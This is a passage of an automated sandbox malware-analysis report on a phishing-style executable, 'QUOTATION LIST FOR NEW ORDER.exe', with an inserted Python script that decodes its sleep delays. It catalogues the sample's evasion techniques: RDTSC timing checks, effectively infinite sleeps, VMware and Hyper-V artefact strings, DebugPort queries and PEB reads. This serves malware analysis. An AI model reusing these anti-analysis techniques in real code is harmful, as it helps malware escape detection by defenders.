          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041BAC8 push dword ptr [B7831292h]; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041A2E5 push es; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041C2AF pushad ; iretd
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0040C376 push es; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00415C8D push esi; retf
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0482D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0304C376 push es; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305C2AF pushad ; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305A2E5 push es; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305BAF4 push dword ptr [B7831292h]; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0304607C push esi; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03054E36 push edx; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03055599 push ds; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305B45C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03055C8D push esi; retf
          Source: initial sample :: Static PE information: section name: .text entropy: 7.77803780051
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Process information set: NOOPENFILEERRORBOX (34 identical entries)
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe :: RDTSC instruction interceptor: First address: 00000000030485E4 second address: 00000000030485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe :: RDTSC instruction interceptor: First address: 000000000304896E second address: 0000000003048974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5528 :: Thread sleep time: -39425s >= -30000s
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5652 :: Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Last function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Thread delayed: delay time: 39425
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Thread delayed: delay time: 922337203685477
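The sleep values above carry an "s" suffix but are milliseconds: 922337203685477 is INT64_MAX (0x7FFFFFFFFFFFFFFF) expressed in the 100 ns ticks that NtDelayExecution counts, truncated to whole milliseconds, and the "-30000s" threshold is the 30 second mark. The Python below is an added example, not sandbox code: it converts the values back to the relative delay argument the kernel sees, flags the effectively infinite one (roughly 29,000 years), and bands the values. The band names and thresholds are this example's own choice; the "Last function: Thread delayed" entry for cmmon32.exe is what such a delay looks like from the sandbox side, with execution never resuming past the sleep.

```python
"""Decoder for the sleep/delay values in a sandbox report.

Added example, not vendor code. The values are treated as milliseconds, which is
the only unit under which 922337203685477 equals INT64_MAX in 100 ns ticks.
"""
import re

INT64_MAX = 2**63 - 1
TICKS_PER_MS = 10_000          # NtDelayExecution's LARGE_INTEGER counts 100 ns ticks
MS_PER_YEAR = 365.25 * 24 * 3600 * 1000

DELAY_LINE = re.compile(r"(?:Thread sleep time:|delay time:)\s*(-?\d+)")


def ms_to_relative_delay(ms):
    """The relative LARGE_INTEGER NtDelayExecution receives for a delay of ms milliseconds
    (what Sleep(ms) passes down): negative values mean relative time."""
    return -(ms * TICKS_PER_MS)


def is_effectively_infinite(ms, tolerance_ticks=TICKS_PER_MS):
    """True when the delay is INT64_MAX ticks give or take one millisecond of rounding."""
    return abs(ms * TICKS_PER_MS - INT64_MAX) <= tolerance_ticks


def classify_delay(ms):
    """Bands chosen for this example; 'long' mirrors the summary's '>= 3 min' signature."""
    if is_effectively_infinite(ms):
        return "infinite"
    if ms >= 3 * 60 * 1000:
        return "long"
    if ms >= 30 * 1000:
        return "suspicious"    # the report's own -30000 threshold
    return "normal"


def parse_delays(text):
    """Extract every sleep/delay value (ms, sign dropped) from report lines."""
    return [abs(int(m.group(1))) for m in DELAY_LINE.finditer(text)]


def summarize(text):
    counts = {}
    for ms in parse_delays(text):
        label = classify_delay(ms)
        counts[label] = counts.get(label, 0) + 1
    return counts


# Delay entries copied from the report above.
REPORT_EXCERPT = """\
Thread delayed: delay time: 922337203685477
TID: 5528 Thread sleep time: -39425s >= -30000s
TID: 5652 Thread sleep time: -922337203685477s >= -30000s
Thread delayed: delay time: 39425
Thread delayed: delay time: 922337203685477
"""

if __name__ == "__main__":
    print(summarize(REPORT_EXCERPT))
    ms = 922337203685477
    print(f"relative delay 0x{-ms_to_relative_delay(ms):016X} ticks, about {ms / MS_PER_YEAR:,.0f} years")
```

On the five entries above this yields three effectively infinite delays and two of about 39 seconds, which is the split a reviewer expects: one value to outlast any sandbox run, one just past the 30 second threshold.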
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmp :: Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmp :: Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmp :: Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 0000000B.00000000.360571948.00000000048E0000.00000004.00000001.sdmp :: Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.335267258.00000000069DA000.00000004.00000001.sdmp :: Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmp :: Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmp :: Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: cmmon32.exe, 0000000C.00000002.513886346.0000000000683000.00000004.00000020.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmp :: Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Process information queried: ProcessInformation
          Checks if the current process is being debugged
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Process queried: DebugPort
          Contains functionality for execution timing, often used to detect debuggers
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_004088A0 rdtsc
          Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00409B10 LdrLoadDll,
          Contains functionality to read the PEB
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0480F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04892073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04888DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0485A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04813D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]
